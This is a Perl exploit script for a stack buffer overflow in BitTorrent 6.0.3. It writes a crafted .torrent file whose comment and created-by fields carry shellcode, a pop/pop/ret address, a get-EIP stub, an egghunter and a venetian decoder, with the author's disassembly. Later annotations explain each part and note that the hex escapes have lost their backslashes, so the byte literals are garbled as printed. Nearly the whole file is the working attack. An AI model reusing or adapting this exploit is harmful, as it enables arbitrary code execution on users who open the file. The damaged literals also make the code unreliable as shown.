# Title : BitTorrent 6.0.3 .torrent File Stack Buffer Overflow Exploit
# Published : 2008-10-19
# Author : Guido Landi
#!/usr/bin/perl
# BitTorrent 6.0.3 .torrent File Stack Buffer Overflow Exploit
# 09/21/2008 by k`sOSe && oVeret
use warnings;
use strict;
# NOTE(review): every "\xNN" escape in this listing appears to have lost its
# backslash during extraction ("x49" where "\x49" is meant), so as written the
# literals below are plain ASCII text; the byte-level comments in this file
# describe the intended bytes, not what this text would actually emit.
# If you change this (avoid x80->x9f unless you really know what you are doing)
# you must also change the length value of the decoder -- see decoder() below.
my $shellcode =
# Author's note on the payload: windows/exec CMD="C:WINDOWSsystem32calc.exe"
#[*] x86/alpha_mixed succeeded, final size 337
# The script treats this as opaque data: it is only measured with length()
# and embedded, length-prefixed, in the "comment" field of the output file.
"x49x49x49x49x49x49x49x49x49x49x49x49x49x49" .
"x49x49x49x37x51x5ax6ax41x58x50x30x41x30x41" .
"x6bx41x41x51x32x41x42x32x42x42x30x42x42x41" .
"x42x58x50x38x41x42x75x4ax49x4bx4cx4bx58x51" .
"x54x43x30x45x50x45x50x4cx4bx51x55x47x4cx4c" .
"x4bx43x4cx45x55x44x38x43x31x4ax4fx4cx4bx50" .
"x4fx42x38x4cx4bx51x4fx47x50x43x31x4ax4bx51" .
"x59x4cx4bx50x34x4cx4bx43x31x4ax4ex46x51x49" .
"x50x4ax39x4ex4cx4bx34x49x50x42x54x43x37x49" .
"x51x48x4ax44x4dx45x51x48x42x4ax4bx4cx34x47" .
"x4bx50x54x47x54x43x34x43x45x4dx35x4cx4bx51" .
"x4fx51x34x45x51x4ax4bx42x46x4cx4bx44x4cx50" .
"x4bx4cx4bx51x4fx45x4cx43x31x4ax4bx4cx4bx45" .
"x4cx4cx4bx45x51x4ax4bx4dx59x51x4cx46x44x45" .
"x54x48x43x51x4fx46x51x4bx46x45x30x46x36x45" .
"x34x4cx4bx47x36x50x30x4cx4bx51x50x44x4cx4c" .
"x4bx44x30x45x4cx4ex4dx4cx4bx45x38x45x58x4d" .
"x59x4bx48x4dx53x49x50x42x4ax50x50x45x38x4a" .
"x50x4cx4ax43x34x51x4fx45x38x4cx58x4bx4ex4c" .
"x4ax44x4ex50x57x4bx4fx4ax47x50x43x46x5ax51" .
"x4cx46x37x50x49x50x4ex51x54x50x4fx50x57x50" .
"x53x51x4cx42x53x43x49x44x33x44x34x45x35x42" .
"x4dx50x33x46x52x51x4cx42x43x43x51x42x4cx45" .
"x33x46x4ex43x55x42x58x42x45x43x30x44x4ax41" .
"x41";
# Author's note: once widened this becomes x21x20x21x20, the EGG tag that
# egghunter() below scans for (stated to hold for the English Windows version).
$shellcode .= "x87x87"; # -> x21x20x21x20 -> EGG ( for english windows version )
# Repeated 192 times in $stack_buffer below.  The address is the author's and
# is tied to the BitTorrent 6.0.3 build named in the header comment.
my $ret = "x3fx41"; # -> unicode friendly pop,pop,ret
# unicode friendly get_EIP (needed by the venetian decoder)
sub get_eip
{
# Returns the author's "unicode friendly" get-EIP stub as one literal (no
# explicit `return`; Perl yields the last evaluated expression).  The listing
# below is the author's disassembly of the intended bytes; the interleaved
# "0041 00" / "0042 00" rows appear to be the filler that results from
# widening the x41/x42 bytes, which is why the literal alternates real opcodes
# with x41/x42 (presumably -- confirm against the author's description).
# The `"x42x40" x 12` term matches the twelve INC EAX rows.  As printed here
# the literal has lost the backslashes of its escapes.
#0041 00 ADD BYTE PTR DS:[ECX],AL
#5F POP EDI
#0041 00 ADD BYTE PTR DS:[ECX],AL
#5F POP EDI
#0041 00 ADD BYTE PTR DS:[ECX],AL
#6A 00 PUSH 0
#58 POP EAX
#0041 00 ADD BYTE PTR DS:[ECX],AL
#57 PUSH EDI
#0041 00 ADD BYTE PTR DS:[ECX],AL
#54 PUSH ESP
#0041 00 ADD BYTE PTR DS:[ECX],AL
#5A POP EDX
#0042 00 ADD BYTE PTR DS:[EDX],AL
#40 INC EAX
#0042 00 ADD BYTE PTR DS:[EDX],AL
#40 INC EAX
#0042 00 ADD BYTE PTR DS:[EDX],AL
#40 INC EAX
#0042 00 ADD BYTE PTR DS:[EDX],AL
#40 INC EAX
#0042 00 ADD BYTE PTR DS:[EDX],AL
#40 INC EAX
#0042 00 ADD BYTE PTR DS:[EDX],AL
#40 INC EAX
#0042 00 ADD BYTE PTR DS:[EDX],AL
#40 INC EAX
#0042 00 ADD BYTE PTR DS:[EDX],AL
#40 INC EAX
#0042 00 ADD BYTE PTR DS:[EDX],AL
#40 INC EAX
#0042 00 ADD BYTE PTR DS:[EDX],AL
#40 INC EAX
#0042 00 ADD BYTE PTR DS:[EDX],AL
#40 INC EAX
#0042 00 ADD BYTE PTR DS:[EDX],AL
#40 INC EAX
#0042 00 ADD BYTE PTR DS:[EDX],AL
#43 INC EBX
#0042 00 ADD BYTE PTR DS:[EDX],AL
#58 POP EAX
#0041 00 ADD BYTE PTR DS:[ECX],AL
"x5fx41x5fx41x6ax58x41x57x41x54x41x5a" . "x42x40" x 12 . "x42x43" . "x42x58x41";
}
sub egghunter
{
# Returns the author's egghunter stub as a single literal (implicit return of
# the last expression).  Per the listing below it starts at 0x00720000 and
# loops, incrementing ESI, until the dword at ESI equals the egg 0x20212021,
# i.e. the widened form of the x87x87 tag appended to $shellcode above.
# As printed here the literal has lost the backslashes of its escapes.
#6A01 PUSH 1
#5E POP ESI
#4E DEC ESI (=0)
#6A72 PUSH 72 <- starts from 0x00720000
#56 PUSH ESI
#4C DEC ESP
#4C DEC ESP
#5E POP ESI
#5E POP ESI <- ESI == 0x00720000
#BA21202120 /MOV EDX,20212021 <- egg
#46 |INC ESI
#3B16 |CMP EDX,DWORD PTR DS:[ESI]
#75FB JNZ SHORT egghunter
"x6Ax01x5Ex4Ex6Ax72x56x4Cx4Cx5Ex5ExBAx21x20x21x20x46x3Bx16x75xFB";
}
# this will decode the unicode-expanded shellcode, pushing it onto the stack, and then execute it
sub decoder
{
# Returns the stack-decoder stub as a single literal (implicit return).  Per the
# listing below it LODS one dword at a time from ESI, pushes it, steps ESI back
# six bytes, and repeats while EBX is above 1; EBX comes from the
# PUSH 0x55010101 / DEC ESP / POP EBX sequence, so that constant appears to be
# the "length value of the decoder" the header comment says must track the
# shellcode size -- confirm.  It finishes by transferring control to the stack
# (PUSH ESP / POP ECX / PUSH ECX / RET).  As printed here the literal has lost
# the backslashes of its escapes.
#46 INC ESI
#6A01 PUSH 1
#6801010155 PUSH 0x55010101
#4C DEC ESP
#5B POP EBX
#5B POP EBX
#AD /LODS DWORD PTR DS:[ESI]
#50 |PUSH EAX
#44 |INC ESP
#44 |INC ESP
#44 |INC ESP
#4E |DEC ESI
#4E |DEC ESI
#4E |DEC ESI
#4E |DEC ESI
#4E |DEC ESI
#4E |DEC ESI
#4B |DEC EBX
#83FB01 |CMP EBX,1
#75EF JNE SHORT decoder
#54 PUSH ESP
#59 POP ECX
#4C DEC ESP -> realign
#51 PUSH ECX
#C3 RET
"x46x6Ax01x68x01x01x01x55x4Cx5Bx5BxADx50x44x44x44x4Ex4Ex4Ex4Ex4Ex4Ex4Bx83xFBx01x75xEFx54x59x4cx51xc3";
}
# venetian decoder + venetian-encoded egghunter and decoder
sub venetian_decoder
{
# Returns the author's venetian decoder together with the venetian-encoded
# egghunter and decoder as one opaque literal (implicit return).  Unlike the
# other stubs there is no disassembly listing for it, so its layout cannot be
# verified from this file.  The long run of x04 bytes looks like padding and
# the final two lines appear to echo every other byte of egghunter() and
# decoder() -- presumably the encoded stubs; confirm against the author's
# generator.  As printed here the literal has lost the backslashes of its
# escapes.
"x05x03x01x71x2Dx01x01x71x40x71xC6x01x71x40x71x40".
"x71xC6x4Ex71x40x71x40x71xC6x72x71x40x71x40x71xC6".
"x4Cx71x40x71x40x71xC6x5Ex71x40x71x40x71xC6xBAx71".
"x40x71x40x71xC6x20x71x40x71x40x71xC6x20x71x40x71".
"x40x71xC6x3Bx71x40x71x40x71xC6x75x71x40x71x40x71".
"xC6x46x71x40x71x40x71xC6x01x71x40x71x40x71xC6x01".
"x71x40x71x40x71xC6x01x71x40x71x40x71xC6x4Cx71x40".
"x71x40x71xC6x5Bx71x40x71x40x71xC6x50x71x40x71x40".
"x71xC6x44x71x40x71x40x71xC6x4Ex71x40x71x40x71xC6".
"x4Ex71x40x71x40x71xC6x4Ex71x40x71x40x71xC6x4Bx71".
"x40x71xFExFEx40x71xC6xFBx71x40x71x40x71xC6x75x71".
"x40x71x40x71xC6x54x71x40x71x40x71xC6x4Cx71x40x71".
"x40x71xC6xC3x71x40x71x04x04x04x04x04x04x04x04x04".
"x04x04x04x04x04x04x04x04x04x04x04x04x04x04x04x04".
"x04x04x04x04x04x04x04x04x04x04x04x04x04x04x04x04".
"x04x04x04x04x04x04x04x04x04x04x04x04x04x04x04x04".
"x6Ax5Ex6Ax56x4Cx5Ex21x21x46x16xFBx6Ax68x01x55x5B".
"xADx44x44x4Ex4Ex4Ex81x01xEFx59x51";
}
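# The oversized field: 192 copies of the pop/pop/ret address, then the get-EIP
# stub, then the venetian decoder.  Its size is only ever read via length().
my $stack_buffer = $ret x 192 . get_eip() . venetian_decoder();

# Emit the bencoded .torrent.  Both payloads ride in ordinary, correctly
# length-prefixed string fields -- "comment" carries $shellcode and
# "created by" carries $stack_buffer -- so the file is well-formed bencode and
# only the field sizes are abnormal; that size is also what a scanner or a
# hardened parser can reject on.
#
# Fixes over the original: 3-arg open on a lexical handle instead of a bareword
# 2-arg open, raw mode because the content is binary (text mode on Windows
# would rewrite the trailing x0a), $! in the failure messages, and a checked
# close, since buffered write errors only surface there.  The literals are
# reproduced byte-for-byte; as printed here their escapes have lost the
# backslashes (see the note above $shellcode).
my $out_file = 'torrent.torrent';
open my $out, '>', $out_file or die "open $out_file: $!";
binmode $out;
print {$out}
    "d8:announce17:http://qwerty.qwe7:comment" .
    length($shellcode) . ":" . $shellcode .
    "10:created by" .
    length($stack_buffer) . ":" . $stack_buffer .
    "13:creation datei1218555046e8:encoding10:iso-8859-14:infod6:lengthi1e4:name6:bu.txt12:piece lengthi65536e6:pieces20:" .
    # 20 "pieces" bytes, then what appear to be the two closing 'e's (x65x65)
    # of the info and outer dictionaries and a trailing newline (x0a).
    "x86xf7xe4x37xfaxa5xa7xfcxe1x5dx1dxdcxb9xeaxeaxeax37x76x67xb8x65x65x0a"
    or die "write $out_file: $!";
close $out or die "close $out_file: $!";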